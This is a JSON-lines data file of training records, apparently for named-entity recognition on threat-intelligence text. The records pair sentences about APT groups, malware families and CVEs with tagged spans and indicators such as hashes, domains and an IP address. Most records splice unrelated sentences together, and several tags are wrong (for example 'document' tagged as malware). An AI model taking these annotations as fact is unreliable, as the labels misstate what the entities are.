{"text": "Perkele intercepts mTANs ( confirmation codes for banking operations ) sent by the bank via text message . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito . MD5 : e3878d541d17b156b7ca447eeb49d96a . Minidionis – one more APT with a usage of cloud drives • Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": {"MALWARE: Perkele": [[0, 7]], "FILEPATH: e3878d541d17b156b7ca447eeb49d96a": [[210, 242]], "THREAT_ACTOR: Minidionis": [[245, 255]], "THREAT_ACTOR: Miniduke": [[302, 310]], "ORGANIZATION: Nemesis Gemina": [[321, 335]], "ORGANIZATION: Botgen Studio": [[344, 357]], "MALWARE: CozyDuke": [[377, 385]], "TOOL: Kaspersky Intelligence Reporting .": [[416, 450]]}, "info": {"id": "cyberner_stix_train_003260", "source": "cyberner_stix_train"}}
{"text": "As mentioned above , banking Trojans are perhaps the most complex of all mobile threats , and Svpeng is one of the most striking examples . Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group . The campaign identifiers found in the samples we ’ve analyzed match the subdomain part of the C&C server , showing that these samples were really targeted against these universities . SocialPolitical Hacktivism primarily intrinsic Social or Ideological issues create a motivation for some to attack organizations to make a statement .", "spans": {"MALWARE: Svpeng": [[94, 100]], "TOOL: PCShare malware family": [[229, 251]], "TOOL: C&C": [[398, 401]], "ORGANIZATION: organizations": [[603, 616]]}, "info": {"id": "cyberner_stix_train_003261", "source": "cyberner_stix_train"}}
{"text": "] it Firenze server1gioiat.exodus.connexxa [ . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection . 1 . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[75, 85]]}, "info": {"id": "cyberner_stix_train_003262", "source": "cyberner_stix_train"}}
{"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and watering hole ( strategic web compromise ) attacks . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"THREAT_ACTOR: actors": [[50, 56]], "THREAT_ACTOR: Scarlet Mimic": [[66, 79]], "THREAT_ACTOR: APT37": [[165, 170]], "ORGANIZATION: research fellow": [[182, 197]], "ORGANIZATION: advisory member": [[200, 215]], "ORGANIZATION: journalist": [[222, 232]], "ORGANIZATION: strategic organizations": [[296, 319]]}, "info": {"id": "cyberner_stix_train_003263", "source": "cyberner_stix_train"}}
{"text": "Our analysis indicates that this trojan is in its testing stage but given its potential , every mobile user should be aware of GPlayed . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . The publicly available backdoors and tools utilized by APT33 – including NANOCORE , NETWIRE , and ALFA Shell – are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups .", "spans": {"MALWARE: GPlayed": [[127, 134]], "THREAT_ACTOR: BITTER APT": [[137, 147]], "THREAT_ACTOR: APT33": [[286, 291]], "MALWARE: NANOCORE": [[304, 312]], "MALWARE: NETWIRE": [[315, 322]], "MALWARE: ALFA Shell": [[329, 339]], "THREAT_ACTOR: threat groups": [[460, 473]]}, "info": {"id": "cyberner_stix_train_003264", "source": "cyberner_stix_train"}}
{"text": "The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server .", "spans": {"ORGANIZATION: Microsoft": [[24, 33]], "TOOL: Word": [[34, 38]], "ORGANIZATION: Adobe": [[73, 78]], "TOOL: Flash": [[79, 84], [133, 138]]}, "info": {"id": "cyberner_stix_train_003265", "source": "cyberner_stix_train"}}
{"text": "From a process and file perspective , Hermes and Ryuk target files in a similar fashion . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"TOOL: Hermes": [[38, 44]], "TOOL: Ryuk": [[49, 53]], "THREAT_ACTOR: ScarCruft": [[90, 99]], "TOOL: Flash Player": [[138, 150]], "VULNERABILITY: exploit": [[151, 158]], "VULNERABILITY: CVE-2016-4117": [[161, 174]]}, "info": {"id": "cyberner_stix_train_003266", "source": "cyberner_stix_train"}}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Turla is a notorious group that has been targeting governments .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "THREAT_ACTOR: Turla": [[215, 220]], "ORGANIZATION: governments": [[266, 277]]}, "info": {"id": "cyberner_stix_train_003267", "source": "cyberner_stix_train"}}
{"text": "The activities of some non-governmental organizations ( NGOs ) challenge governments on politically sensitive issues such as social , humanitarian , and environmental policies .", "spans": {"ORGANIZATION: non-governmental organizations": [[23, 53]], "ORGANIZATION: NGOs": [[56, 60]]}, "info": {"id": "cyberner_stix_train_003268", "source": "cyberner_stix_train"}}
{"text": "This service hides the app from plain sight and loads another ELF library to gather environmental information about the device , such as running processes and apps , and details about device hardware , primarily through parsing system logs and querying running processes . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": {"THREAT_ACTOR: APT41": [[288, 293]], "ORGANIZATION: Kaspersky": [[471, 480]], "ORGANIZATION: FireEye": [[483, 490]], "ORGANIZATION: hospitality sector": [[545, 563]], "THREAT_ACTOR: actor APT28": [[589, 600]]}, "info": {"id": "cyberner_stix_train_003269", "source": "cyberner_stix_train"}}
{"text": "Over time , this campaign will also infect the same device , repeatedly , with the latest malicious patches . n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants . The threat authors have one more evasion technique for these scheduled tasks : some Dexphot variants copy msiexec.exe to an arbitrary location and give it a random name , such as %AppData%\\<random>.exe . As our experience with and knowledge of this threat actor grows , we will update this post or release new technical details as appropriate .", "spans": {"TOOL: DNS tunneling": [[189, 202]], "MALWARE: Dexphot": [[386, 393]], "FILEPATH: msiexec.exe": [[408, 419]], "FILEPATH: %AppData%\\<random>.exe": [[481, 503]], "THREAT_ACTOR: threat actor": [[551, 563]]}, "info": {"id": "cyberner_stix_train_003270", "source": "cyberner_stix_train"}}
{"text": "In 2016 we saw fully functional , very large SPLM / X-Agent modules supporting OS X .", "spans": {"MALWARE: SPLM": [[45, 49]], "MALWARE: X-Agent": [[52, 59]], "SYSTEM: OS X": [[79, 83]]}, "info": {"id": "cyberner_stix_train_003271", "source": "cyberner_stix_train"}}
{"text": "Quasar is a publicly-available commodity RAT , an evolution of his earlier xRAT , by German developer “ MaxXor ” .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: RAT": [[41, 44]], "TOOL: xRAT": [[75, 79]]}, "info": {"id": "cyberner_stix_train_003272", "source": "cyberner_stix_train"}}
{"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": {"SYSTEM: Umbrella": [[0, 8]], "MALWARE: malware": [[185, 192]], "THREAT_ACTOR: APT38": [[324, 329]], "MALWARE: DYEPACK": [[335, 342]], "ORGANIZATION: bank personnel": [[440, 454]]}, "info": {"id": "cyberner_stix_train_003273", "source": "cyberner_stix_train"}}
{"text": "A PDB path contained in a tested file contained a string that appears to be a unique handle or user name .", "spans": {"TOOL: PDB": [[2, 5]]}, "info": {"id": "cyberner_stix_train_003274", "source": "cyberner_stix_train"}}
{"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/Exfiltration tools supporting all major operating systems like Windows ( Bartender ) , MacOS ( JukeBox ) and Linux ( DanceFloor ) .", "spans": {"MALWARE: document": [[5, 13]], "FILEPATH: 'Improvise'": [[143, 154]], "SYSTEM: Windows": [[325, 332]], "TOOL: Bartender": [[335, 344]], "SYSTEM: MacOS": [[349, 354]], "TOOL: JukeBox": [[357, 364]], "TOOL: DanceFloor": [[379, 389]]}, "info": {"id": "cyberner_stix_train_003275", "source": "cyberner_stix_train"}}
{"text": "We have examined all the detected versions , including the latest one that is signed by a certificate valid from September 14 , 2017 . This includes Python scripts . TEMP.Veles ： XENOTIME .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[166, 176]], "THREAT_ACTOR: XENOTIME": [[179, 187]]}, "info": {"id": "cyberner_stix_train_003276", "source": "cyberner_stix_train"}}
{"text": "Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . Trochilus RAT activity was discovered during both months of October and November 2015 .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]]}, "info": {"id": "cyberner_stix_train_003277", "source": "cyberner_stix_train"}}
{"text": "Some tools used by this actor — specifically BlackEnergy and GCat — have been adapted from commodity malware . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": {"THREAT_ACTOR: actor": [[24, 29]], "THREAT_ACTOR: BlackEnergy": [[45, 56]], "THREAT_ACTOR: GCat": [[61, 65]], "ORGANIZATION: Users": [[111, 116]], "THREAT_ACTOR: actors": [[204, 210]]}, "info": {"id": "cyberner_stix_train_003278", "source": "cyberner_stix_train"}}
{"text": "The OnionDuke toolset includes at least a dropper , a loader , an information stealer Trojan and multiple modular variants with associated modules .", "spans": {"MALWARE: OnionDuke": [[4, 13]], "TOOL: dropper": [[42, 49]], "TOOL: loader": [[54, 60]], "TOOL: information stealer": [[66, 85]], "MALWARE: Trojan": [[86, 92]], "TOOL: multiple modular": [[97, 113]]}, "info": {"id": "cyberner_stix_train_003279", "source": "cyberner_stix_train"}}
{"text": "As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs .", "spans": {"MALWARE: Zebrocy": [[50, 57]]}, "info": {"id": "cyberner_stix_train_003280", "source": "cyberner_stix_train"}}
{"text": "What makes Ginp stand out is that it was built from scratch being expanded through regular updates , the last of which including code copied from the infamous Anubis banking Trojan , indicating that its author is cherry-picking the most relevant functionality for its malware . This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . Dragonfly 2.0 : Berserk Bear .", "spans": {"MALWARE: Ginp": [[11, 15]], "MALWARE: Anubis": [[159, 165]], "THREAT_ACTOR: CIA's": [[310, 315]], "TOOL: 'JQJIMPROVISE'": [[316, 330]], "THREAT_ACTOR: Dragonfly 2.0": [[433, 446]], "THREAT_ACTOR: Berserk Bear": [[449, 461]]}, "info": {"id": "cyberner_stix_train_003281", "source": "cyberner_stix_train"}}
{"text": "However , some of the recently identified files display “ extended-capability ”", "spans": {}, "info": {"id": "cyberner_stix_train_003282", "source": "cyberner_stix_train"}}
{"text": "44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4 APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . Winnti : dump.gxxservice.com 142.93.204.230 DigitalOcean . An attacker may have more than a single motivation to target a particular organization .", "spans": {"THREAT_ACTOR: APT40": [[253, 258]], "THREAT_ACTOR: Winnti": [[401, 407]], "DOMAIN: dump.gxxservice.com": [[410, 429]], "IP_ADDRESS: 142.93.204.230": [[430, 444]], "ORGANIZATION: DigitalOcean": [[445, 457]], "THREAT_ACTOR: An attacker": [[460, 471]], "ORGANIZATION: a particular organization": [[521, 546]]}, "info": {"id": "cyberner_stix_train_003283", "source": "cyberner_stix_train"}}
{"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": {"THREAT_ACTOR: APT32": [[27, 32]], "MALWARE: Microsoft ActiveMime file": [[74, 99]], "VULNERABILITY: exploit": [[192, 199]], "VULNERABILITY: CVE-2018-8120": [[205, 218]], "MALWARE: UACME": [[222, 227]]}, "info": {"id": "cyberner_stix_train_003284", "source": "cyberner_stix_train"}}
{"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia .", "spans": {"MALWARE: malicious Word documents": [[21, 45]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "VULNERABILITY: CVE-2014-6332": [[150, 163]], "FILEPATH: Okrum": [[195, 200]]}, "info": {"id": "cyberner_stix_train_003285", "source": "cyberner_stix_train"}}
{"text": "Unit 42 tracks roughly 300 SilverTerrier actors who have registered a combined 11,600 domains over the past five years . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: SilverTerrier actors": [[27, 47]], "ORGANIZATION: embassies": [[198, 207]]}, "info": {"id": "cyberner_stix_train_003286", "source": "cyberner_stix_train"}}
{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land .", "spans": {"ORGANIZATION: Unit 42": [[29, 36]], "MALWARE: EPS files": [[109, 118]], "VULNERABILITY: CVE-2015-2545": [[133, 146]], "VULNERABILITY: CVE-2017-0261": [[151, 164]], "MALWARE: PsExec": [[183, 189]], "ORGANIZATION: Microsoft": [[195, 204]]}, "info": {"id": "cyberner_stix_train_003287", "source": "cyberner_stix_train"}}
{"text": "ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . APT5 has been active since at least 2007 .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "VULNERABILITY: Flash Player exploit": [[48, 68]], "VULNERABILITY: CVE-2016-4117": [[71, 84]], "THREAT_ACTOR: APT5": [[130, 134]]}, "info": {"id": "cyberner_stix_train_003288", "source": "cyberner_stix_train"}}
{"text": "Threat actors can use the services' detailed statistics about which links were clicked when , and from what location , to track the success of a spearphishing campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_003289", "source": "cyberner_stix_train"}}
{"text": "Pivoting off the five highlighted IP ’s above with a shared infrastructure , I pulled the reverse DNS to see what other sites may be present .", "spans": {}, "info": {"id": "cyberner_stix_train_003290", "source": "cyberner_stix_train"}}
{"text": "To attack macOS users , the Lazarus group has developed homemade macOS malware , and added an authentication mechanism to deliver the next stage payload very carefully , as well as loading the next-stage payload without touching the disk .", "spans": {"SYSTEM: macOS": [[10, 15], [65, 70]], "THREAT_ACTOR: Lazarus": [[28, 35]]}, "info": {"id": "cyberner_stix_train_003291", "source": "cyberner_stix_train"}}
{"text": "Allows applications to access information about networks . As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks . They often use point-of-sale malware .", "spans": {"THREAT_ACTOR: CIA": [[82, 85]], "TOOL: point-of-sale": [[192, 205]]}, "info": {"id": "cyberner_stix_train_003292", "source": "cyberner_stix_train"}}
{"text": "Pitty Tiger , like other APT attackers , often use anti-virus \" familiar names \" when registering domains or creating subdomains . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"THREAT_ACTOR: Pitty Tiger": [[0, 11]], "THREAT_ACTOR: APT": [[25, 28]], "THREAT_ACTOR: attackers": [[29, 38]], "THREAT_ACTOR: MoneyTaker": [[155, 165]], "ORGANIZATION: banks": [[209, 214]], "ORGANIZATION: law firm": [[219, 227]], "ORGANIZATION: bank": [[234, 238]]}, "info": {"id": "cyberner_stix_train_003293", "source": "cyberner_stix_train"}}
{"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 – 18abe28730c53de6d9e4786c7765c3d8 2 2.0 From March 18 to 26 we observed the malware operating in multiple areas of the world . FastUploader is a custom FTP tool designed to exfiltrate data at a faster rate than traditional FTP clients . When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": {"MALWARE: FastUploader": [[453, 465]], "TOOL: FTP": [[478, 481], [549, 552]], "ORGANIZATION: CrowdStrike researchers": [[568, 591]], "MALWARE: CozyDuke": [[645, 653]], "MALWARE: CozyBear": [[670, 678]], "MALWARE: CozyCar": [[681, 688]], "MALWARE: Office Monkeys": [[693, 707]], "THREAT_ACTOR: APT29": [[795, 800]], "ORGANIZATION: US White House": [[955, 969]], "ORGANIZATION: Department of State": [[972, 991]], "ORGANIZATION: Democratic National Committee": [[1000, 1029]]}, "info": {"id": "cyberner_stix_train_003294", "source": "cyberner_stix_train"}}
{"text": "] 230 [ . In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke . The majority if the modifications are of removing comments and renaming variables . In fact , we saw instances of compromised stores having both skimmers loaded , which means double trouble for victims as their credit card information is stolen not just once but twice .", "spans": {"THREAT_ACTOR: Dukes": [[103, 108]], "TOOL: CosmicDuke": [[176, 186]]}, "info": {"id": "cyberner_stix_train_003295", "source": "cyberner_stix_train"}}
{"text": "The Infection Chain Once the user downloads and installs one of the infected applications , ‘ SimBad ’ registers itself to the ‘ BOOT_COMPLETE ’ and ‘ USER_PRESENT ’ intents , which lets ‘ SimBad ’ to perform actions after the device has finished booting and while the user is using his device respectively . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . Suckfly conducted a multistage attack between April 22 and May 4 .", "spans": {"MALWARE: SimBad": [[94, 100], [189, 195]], "THREAT_ACTOR: BRONZE BUTLER": [[309, 322]], "TOOL: Mimikatz": [[359, 367]], "TOOL: WCE": [[372, 375]]}, "info": {"id": "cyberner_stix_train_003296", "source": "cyberner_stix_train"}}
{"text": "Credential phishing and an Android banking Trojan combine in Austrian mobile attacks NOVEMBER 03 , 2017 Overview Credential phishing , banking Trojans , and credit card phishing schemes are common threats that we regularly observe both at scale and in more targeted attacks . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . Some organizations track North Korean clusters or groups such as Bluenoroff , APT37 , and APT38 separately , while other organizations may track some activity associated with those group names by the name Lazarus Group .", "spans": {"SYSTEM: Android": [[27, 34]], "ORGANIZATION: ClearSky": [[461, 469]], "THREAT_ACTOR: Bluenoroff": [[589, 599]], "THREAT_ACTOR: APT37": [[602, 607]], "THREAT_ACTOR: APT38": [[614, 619]], "THREAT_ACTOR: Lazarus Group": [[729, 742]]}, "info": {"id": "cyberner_stix_train_003297", "source": "cyberner_stix_train"}}
{"text": "Within some of the first of those commands , the bot typically receives a list of banks it will target . Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity . This is probably the Latin spelling for the word “health” in Farsi . Forbes Technology Council is an invitationonly community for worldclass CIOs , CTOs and technology executives .", "spans": {"THREAT_ACTOR: APT37": [[225, 230]], "ORGANIZATION: Forbes Technology Council": [[400, 425]]}, "info": {"id": "cyberner_stix_train_003298", "source": "cyberner_stix_train"}}
{"text": "Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests .", "spans": {"THREAT_ACTOR: group": [[36, 41]], "ORGANIZATION: Governments": [[120, 131]], "ORGANIZATION: Academy": [[134, 141]], "ORGANIZATION: Crypto-Currency": [[144, 159]], "ORGANIZATION: Telecommunications": [[162, 180]], "ORGANIZATION: Oil sectors": [[189, 200]], "FILEPATH: malware": [[207, 214]], "MALWARE: CMD/PowerShell": [[243, 257]], "THREAT_ACTOR: attackers": [[275, 284]]}, "info": {"id": "cyberner_stix_train_003299", "source": "cyberner_stix_train"}}
{"text": "The MUTEX name is different too : FG00nxojVs4gLBnwKc7HhmdK0h .", "spans": {}, "info": {"id": "cyberner_stix_train_003300", "source": "cyberner_stix_train"}}
{"text": "In this case , we ’re seeing a definite problem with the overly-conservative naming approach used as it engenders confusion in a significant subset of the intended audience .", "spans": {}, "info": {"id": "cyberner_stix_train_003301", "source": "cyberner_stix_train"}}
{"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations . wsc_proxy.exe plugins-setup.exe SoftManager.exe GetEFA.exe . Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"ORGANIZATION: CTU": [[184, 187]], "FILEPATH: wsc_proxy.exe": [[270, 283]], "FILEPATH: plugins-setup.exe": [[284, 301]], "FILEPATH: SoftManager.exe": [[302, 317]], "FILEPATH: GetEFA.exe": [[318, 328]], "MALWARE: Rhysida": [[331, 338]]}, "info": {"id": "cyberner_stix_train_003302", "source": "cyberner_stix_train"}}
{"text": "After rendering the ad on the screen , the app tries to identify the part of the advertisement website to click . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . The message subject read “ DPP ’s Contact Information Update ” , apparently targeting those interested in contact information for DPP members or politicians . ( CISA , CNN )", "spans": {"MALWARE: attachment": [[149, 159]], "TOOL: NetTraveler": [[193, 204]], "MALWARE: DLL side-loading": [[213, 229]], "ORGANIZATION: DPP": [[276, 279], [379, 382]], "ORGANIZATION: CISA": [[410, 414]], "ORGANIZATION: CNN": [[417, 420]]}, "info": {"id": "cyberner_stix_train_003303", "source": "cyberner_stix_train"}}
{"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like .", "spans": {"ORGANIZATION: Symantec": [[88, 96]]}, "info": {"id": "cyberner_stix_train_003304", "source": "cyberner_stix_train"}}
{"text": "This group has been operating in the Middle East since 2012 .", "spans": {}, "info": {"id": "cyberner_stix_train_003305", "source": "cyberner_stix_train"}}
{"text": "The ZIP archives have names relevant to the targets and contain both legitimate files and malware .", "spans": {"TOOL: ZIP": [[4, 7]]}, "info": {"id": "cyberner_stix_train_003306", "source": "cyberner_stix_train"}}
{"text": "Based on our technical analysis of the known PinchDuke samples from 2008 however , we believe PinchDuke to have been under development by the summer of 2008 .", "spans": {"MALWARE: PinchDuke": [[45, 54], [94, 103]]}, "info": {"id": "cyberner_stix_train_003307", "source": "cyberner_stix_train"}}
{"text": "Aside from the natural value of phone numbers associated with the names of their owners . After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Once this export is called , it checks for a hidden window with a caption of Hello Google ! Based upon analysis and gathered data , we have determined that the operation is conducted by a Vietnamese threat actor .", "spans": {"TOOL: Powermud": [[144, 152]], "TOOL: Powemuddy": [[156, 165]], "THREAT_ACTOR: Seedworm": [[168, 176]]}, "info": {"id": "cyberner_stix_train_003308", "source": "cyberner_stix_train"}}
{"text": "CVE-2015-8651 : Adobe Flash Player 18.0.0.324 and 19.x Vulnerability .", "spans": {"VULNERABILITY: CVE-2015-8651": [[0, 13]], "TOOL: Adobe Flash Player": [[16, 34]]}, "info": {"id": "cyberner_stix_train_003309", "source": "cyberner_stix_train"}}
{"text": "However , the keylogger needs to be specifically enabled by a command sent from the C2 server . The company specializes in finance and natural resources specific to that region . FIN7 S-APT/Cobalt phishing documents may seem basic , but when combined with their extensive social engineering and focused targeting , they are quite successful . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": {"ORGANIZATION: finance": [[123, 130]], "MALWARE: FIN7 S-APT/Cobalt": [[179, 196]], "MALWARE: SocGholish": [[421, 431]]}, "info": {"id": "cyberner_stix_train_003310", "source": "cyberner_stix_train"}}
{"text": "Figure 5 – Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . FIN7 S-APT/GRIFFON : hpservice-cdn.com realtek-cdn.com logitech-cdn.com pci-cdn.com appleservice-cdn.com servicebing-cdn.com . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": {"MALWARE: Anubis": [[86, 92]], "ORGANIZATION: Symantec": [[211, 219]], "MALWARE: FIN7 S-APT/GRIFFON": [[325, 343]], "DOMAIN: hpservice-cdn.com": [[346, 363]], "DOMAIN: realtek-cdn.com": [[364, 379]], "DOMAIN: logitech-cdn.com": [[380, 396]], "DOMAIN: pci-cdn.com": [[397, 408]], "DOMAIN: appleservice-cdn.com": [[409, 429]], "DOMAIN: servicebing-cdn.com": [[430, 449]], "ORGANIZATION: @AnFam17": [[465, 473]]}, "info": {"id": "cyberner_stix_train_003311", "source": "cyberner_stix_train"}}
{"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 .", "spans": {"THREAT_ACTOR: Whitefly": [[88, 96]], "ORGANIZATION: defense": [[130, 137]], "ORGANIZATION: telecoms": [[140, 148]], "ORGANIZATION: energy": [[155, 161]]}, "info": {"id": "cyberner_stix_train_003312", "source": "cyberner_stix_train"}}
{"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": {"THREAT_ACTOR: group": [[10, 15]], "ORGANIZATION: businesses": [[36, 46]], "ORGANIZATION: Muslim activists": [[262, 278]], "ORGANIZATION: Russian government": [[320, 338]]}, "info": {"id": "cyberner_stix_train_003313", "source": "cyberner_stix_train"}}
{"text": "CTU researchers believe legitimate websites are used to host tools because web proxies categorize the sites as benign .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_003314", "source": "cyberner_stix_train"}}
{"text": "INTERNET - Allows the application to open network sockets . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks .", "spans": {"ORGANIZATION: FireEye": [[60, 67]], "MALWARE: TONEDEAF": [[143, 151]], "MALWARE: VALUEVAULT": [[154, 164]], "MALWARE: LONGWATCH": [[171, 180]], "ORGANIZATION: Unit 42": [[214, 221]], "THREAT_ACTOR: Gorgon Group": [[300, 312]], "MALWARE: shared infrastructure": [[323, 344]]}, "info": {"id": "cyberner_stix_train_003315", "source": "cyberner_stix_train"}}
{"text": "After that , the Trojan will replace the original /system/bin/ip with a malicious one from the archive ( Game324.res or Game644.res ) . VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others . RevengeHotels : e675bdf6557350a02f15c14f386fcc47 . These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": {"TOOL: VAMP": [[136, 140]], "THREAT_ACTOR: RevengeHotels": [[271, 284]], "FILEPATH: e675bdf6557350a02f15c14f386fcc47": [[287, 319]], "MALWARE: malicious PDF files": [[328, 347]], "TOOL: Adobe Reader versions 9 , 10 and 11": [[384, 419]]}, "info": {"id": "cyberner_stix_train_003316", "source": "cyberner_stix_train"}}
